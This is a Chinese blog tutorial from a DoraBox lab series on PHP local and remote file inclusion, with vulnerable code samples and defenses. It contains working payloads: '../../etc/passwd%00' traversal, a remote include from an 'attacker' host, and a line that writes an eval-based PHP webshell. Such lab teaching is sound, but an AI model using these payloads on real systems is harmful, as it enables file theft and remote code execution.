【DoraBox实战】————4、文件包含分析与研究

最新推荐文章于 2025-04-10 10:08:30 发布
最新推荐文章于 2025-04-10 10:08:30 发布
阅读量776 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 【渗透测试实战2】 # DoraBox
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Fly_hps/article/details/98759823
本文深入探讨文件包含漏洞,包括本地与远程文件包含的原理、利用条件及防御策略,揭示PHP程序开发中的安全隐患。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文件包含简介

程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无须再次编写,这种调用文件的过程一般被称为包含。

程序开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。
文件包含漏洞在PHP Web Application中居多,而在JSP,ASP,ASP.NET程序中却非常少,甚至没有包含漏洞的存在。

文件包含相关函数

PHP常见的导致文件包含的函数如下:

  • include()
  • include_once()
  • require()
  • require_once()
  • fopen()
  • readfile()

当使用前4个函数包含一个新的文件时,只要文件内容符合PHP语法规范,那么任何扩展名都可以被PHP解析。包含非PHP语法规范源文件时,将会暴露其源代码。后2个函数会造成敏感文件被读取

文件包含的利用条件

   1、 include()等函数通过动态变量的方式引入需要包含的文件。

    2、用户能够控制该动态变量

文件包含分类

1、本地文件包含

<?php  
	$file = $_GET['file'];  
	if (file_exists('/home/wwwrun/'.$file.'.php'))  
	{  
    	include '/home/wwwrun/'.$file.'.php';  
	}  
?>

假如用户控制$file的值为“../../etc/passwd”,那么这段代码相当于include '/home/wwwrun/../../etc/passwd.php',而这个文件显然是不存在的,那么如何处理呢?这里需要用到字符串截断技巧:PHP内核是由C语言实现的,因此使用了C语言中的一些字符串处理函数。在连接字符串时,0字节(\x00)将作为字符串结束符。所以在这个地方,攻击者只要在最后加入一个0字节,就能截断file变量之后的字符串,即:../../etc/passwd\0,通过Web输入时,只需要UrlEncode,变成../../etc/passwd%00。

这里的“../../../”的方式又被称为“目录遍历”。可以通过配置PHP的open_basedir来限制,其作用是限制在某个特定目录下PHP能打开的文件。例如open_basedir = D:\soft\develop\env\\sites\www.a.com\,在windows下多个目录应当用分号隔开,在Linux下则用冒号隔开。

防御策略:要解决文件包含漏洞,一种方式是使用枚举,另一种是采用白名单的方式。

2、远程文件包含

如果PHP的配置选项allow_url_includeON的话,则include/require函数是可以加载远程文件的,这种漏洞被称为远程文件包含漏洞。

require_once $basePath . '/action/m_share.php' 

攻击者可以构造如下的攻击URL: /?param=http://attacker/phpshell.txt最终加载的代码实际上执行了require_once 'http://attacker/phpshell.txt?/action/m_share.php'

问号后面的代码被解释成URL的querystring,也是一种“截断”,这是在利用远程文件包含漏洞时的常见技巧。同样的,%00也可以用做截断符号。

文件包含实战

远程文件包含

分析:首先查看源代码发现这里直接包含了file而未做任何检查以及目录限制,存在任意文件包含漏洞,因为没有目录限制所以可以远程包含

在这里我们首先找一个有php的网站看看:

使用该index.php为包含对象:

下面进行包含操作:

从上面的结果中可以看到成功包含该文件~

B、本地文件包含

源代码:

从上面的代码中可以发现这里限制了目录为“./”,这里其实还是可以通过目录遍历来绕过的,下面我先包含以下当前目录下的测试文件试试看,先来一个txt.txt:

成功包含,同时你会发现在txt中的php代码竟然会被执行,所以也算是一个小技巧哦-

之后我们使用“./”来绕过目录限制包含以下其他目录下的文件:

执行之后成功包含:

最后来一个“文件包含写shell”:

首先上传一个图片或者txt文档,在文档中写入以下php语句:

<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[cmd]);?>");?>

之后包含该文件:

 

之后可以看到成功写入shell:

文件包含防御

1.严格判断包含的参数是否外部可控,因为文件包含漏洞利用成功与否的关键点就在于被包含的文件是否可被外部控制;
2.路径限制:限制被包含的文件只能在某一文件夹内,一定要禁止目录跳转字符,如:“../”
3.包含文件验证:验证被包含的文件是否是白名单中的一员;
4.尽量不要使用动态包含,可以在需要包含的页面固定写好,如:include("head.php");

第二阶段 PHP代码审计之文件包含
qq_22132931的博客
11-20 849
PHP代码审计之文件包含
【漏洞挖掘】——75、任意文件读取攻防原理
Fly_鹏程万里
06-11 387
在web安全中任意文件读取漏洞是非常常见的一种漏洞,属于文件操作类漏洞,一般常见于PHP/java/python语言中,任意文件读取漏洞,顾名思义就是可以任意读取服务器上部分或者全部文件的漏洞,攻击者利用此漏洞可以读取服务器敏感文件如/etc/passwd,/etc/sadow,web.config等,漏洞一般存在于文件下载参数,文件包含参数,主要是由于程序对传入的文件名或者文件路径没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露。
文件包含漏洞原理分析
weixin_30955341的博客
08-03 1280
文件包含这个漏洞,用我自己的话来说就是程序员在网站设计中,为方便自己在设计构架时,使用了一些包含的函数,就像'文件包含'这几个字的字面意思一样,在文件中,包含一个文件。 我在总结这篇文章的时候看了,其他人总结的,感觉别人总结的很是详细,就像一开始我只认为包含只有PHP代码中才存在,后来我再整理复习的时候,才发现,包含这个漏洞在各大语言中,都存在的,只不过现在大部分网站都是PHP网站,所以存在这个...
网络安全 0 基础进阶必学:反黑客蜜罐溯源实操,HFish 使用全攻略
最新发布
Cairo_A的博客
04-10 1008
蜜罐技术本质上是一种对攻击方进行欺骗的技术,通过布置一些作为诱饵的主机、网络服务或者信息,诱使攻击方对它们实施攻击,从而可以对攻击行为进行捕获和分析,了解攻击方所使用的工具方法,推测攻击意图和动机,能够让防御方清晰地了解他们所面对的安全威胁,并通过技术和管理手段来增强实际系统的安全防护能力。
DoraBox-文件包含 文件上传
baynk的博客
11-25 1330
0x00 前言 文件包含这个就不用多说了,玩了很多了,各个靶场都会有的东西。 文件上传是getshell的最常用手法之一,有时也会配合文件包含一起getshell,看这个吧,很全,Upload-labs。 0x01 任意文件包含 用的include()函数,比如我这里可以读/etc/passwd 没有什么很特别的限制 0x02 目录限制文件包含 发现多了一个./,应该只能用相对路径来完成...
代码审计-文件包含漏洞
SmileAndFun的博客
09-10 330
代码审计-文件包含漏洞 注:文件仅用于学术交流,不用于其它用途 1)本质 文件包含并不属于漏洞,简单的理解为公共文件,大家都可以去调用它,由于对包含进来的文件不可控,造成攻击者进行任意文件包含(自定义构造恶意文件),导致文件包含漏洞的产生(注:包含的文件会被当成脚本文件来解析),文件包含分为本地文件包含(LFI)和远程文件包含(RFI)(需要设置allow_url_include = On,默认不开启) 2)php四个函数 include:使用include引用外部文件时,只有代码执行到include代码段
DoraBox靶场(三)文件包含
Lorezon的博客
03-17 358
任意文件包含 在靶场目录下有个txt文件,可以直接读取 目录限制文件包含 源码有不同的地方 "…/"的含义就是返回上一目录,可以用这种返回层级目录的方式得到信息。 因为靶场的phpinfo文件在两个上层目录,所以输入…/…/phpinfo.php ...
DoraBox实战】————7、命令执行分析研究
Fly_鹏程万里
08-09 647
命令执行漏洞 当应用需要调用一些外部程序去处理内容时,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,可注入恶意系统命令到正常命令中,造成命令执行攻击。 命令执行漏洞原理 在操作系统中,“&、|、||”都可以作为命令连接符使用,用户通过浏览器提交执行命令时由于服务器端没有针对执行函数做过滤,导致在没...
DoraBox实战】————10、XXE分析研究
Fly_鹏程万里
08-10 848
什么是XXE 简单来说,XXE就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。 XXE检测 第一步检测XML是否会被成功解析: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE ANY [ <!ENTITY name "my ...
DoraBox实战】————1、SQL注入分析研究
Fly_鹏程万里
08-06 813
前言 本篇文章将对SQL数字型、字符型、搜索型3种注入漏洞的分析并利用~ SQL数字型注入 简介:当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。 分析:首先,我们可以来看看该sql_num.php文件的设计: 在这里我们从上面往下面分析,首先我们看一下conn.php文件,发现是数据库连接文件 之后查看function.class.php文件,发现是功能函数...
【漏洞挖掘】——45、 JSONP攻防原理
Fly_鹏程万里
06-07 176
{"id":"1","name":"知道创宇"}callback({"id":"1","name":"知道创宇"});phpprint $callback.'({"id":"1","name":"知道创宇"})';?callback=?});
DoraBox 漏洞练习平台WriteUP.pdf
04-14
DoraBox 漏洞练习平台 WriteUP总结。SQLi 数字型,数字型注入拼接语句一般为 select * from <表名> where id = x x=x' ,程序报错。 x=x and 1=1 时,语句逻辑为真,返回正常结果。 x=x and 1=2 时,语句逻辑为假,返回结果为空。  通过 order by 判断表的列数为 3  构造注入语句,判断回显情况为 2、3 列
DoraBox——文件包含、XSS跨站、两道ctf题
weixin_46204746的博客
03-10 517
1.任意文件包含 这道题没有什么特别的限制,代码中使用include直接包含的,直接输入:txt.txt 2.目录限制文件包含 随便输入:php,发现include()里原来相比多了一个“./”,所以直接访问./txt.txt 3.XSS 反射型 它指的是攻击者向目标网站中插入恶意代码(但恶意代码并未保存在目标网站中),只有当用户浏览该页面时,通过欺骗用户让用户自己点击链接(攻击者事先准备好的...
文件包含漏洞分析讲解
明哥哥知识分享
09-01 486
一、什么是文件包含? 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接)。 二、文件包含函数 PHP中文件包含函数有以下四种 require() require_once() include() include_once() 三、漏洞产生的原因 文件
代码审计——DVWA File Inclusion(文件包含)
z1756227332的博客
03-09 389
我们先了解一下PHP文件包含的函数,包含的文件会被当成PHP代码执行 include_once() 包含载入的文件会有内部判断机制是否“前面代码”已经包含载入过,如果载入,就不再载入。 include()包含载入的文件不判断是否重复包含,只要执行include(),就会包含一次,文件包含失败时会报一个"错误",然后继续执行代码。 require_once()函数会有内部判断机制是否“前面代码”已经...
文件包含解析
qq_64332865的博客
02-28 357
实验原理 1.文件包含函数加载的参数没有经过过滤或者严格定义,可以被用户控制,包含了其他恶意文件,导致执行了非预期的代码。分类:本地文件包含和远程文件包含。 2.可利用途径:读取敏感信息、远程包含shell、本地包含配合文件上传; 3.php伪协议 1,本地文件包含(无视后缀) 创建一个index.php文件, 然后再创建一个1.txt,文件内容为 然后尝试文件包含访问 可以显示出来,然后可以尝试更换文件后缀名,在进行尝试 后缀名更换为jpg也可以显示出来,在继续更换为ph...
【合天网安】DoraBox文件包含及任意文件读取漏洞
hehigoxqc606的博客
09-01 779
【合天网安实验室】DoraBox文件包含及任意文件读取漏洞 目的: 过DoraBox靶场系列练习,学习任意文件包含、目录限制文件包含及任意文件读取漏洞的利用过程。 实验过程: 1.确保Apache、MySQL服务正常开启 2、查看.txt文本内容 3.使用include直接包含,可以直接进行任意文件读取 4.在file输入.txt文档路径,点击【submit】,显示以下内容 成功包含并执行了.txt的PHP代码 5、目录限制文...
DoraBox xss跨站&文件包含
B_roin的博客
03-09 588
XSS跨站 xss直接利益就是拿到用户浏览器的cookie xss传播性强,间接攻击 xss漏洞攻击本质: 1.恶意代码未经过滤,网站正常的代码混在一起 2.浏览器无法分辨哪些脚本可信,导致恶意脚本被执行 可跨站标签 <img’> 标签scr属性 <script’> 标签src属性 <link’> 标签href属性 css中<img’> 标签...
DoraBox靶场(四)文件上传
Lorezon的博客
03-20 385
任意文件上传 这关没啥说的,什么文件都可以。 JS限制文件上传 上传php文件,提示不允许上传,并给出了允许上传的文件类型。 先上传jpg文件,再抓包拦截改文件类型。 成功上传了php,蚁剑连接。 MIME限制上传 上传php文件,显示文件类型不正确。 经过测试,jpg文件可以成功上传。 抓包看php和jpg有什么不同。 两者的Content-Type值不相同。 把php的Content-...
DoraBox漏洞平台SQL注入攻防实战总结
字符型注入数字型类似,但处理的是包含字符串的输入。例如,`SELECT * FROM <表名> WHERE id = 'x'`。当用户输入`x=x' and '1'='1`时,语句变为`SELECT * FROM <表名> WHERE id = 'x' and '1'='1'`,因单引号成功...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值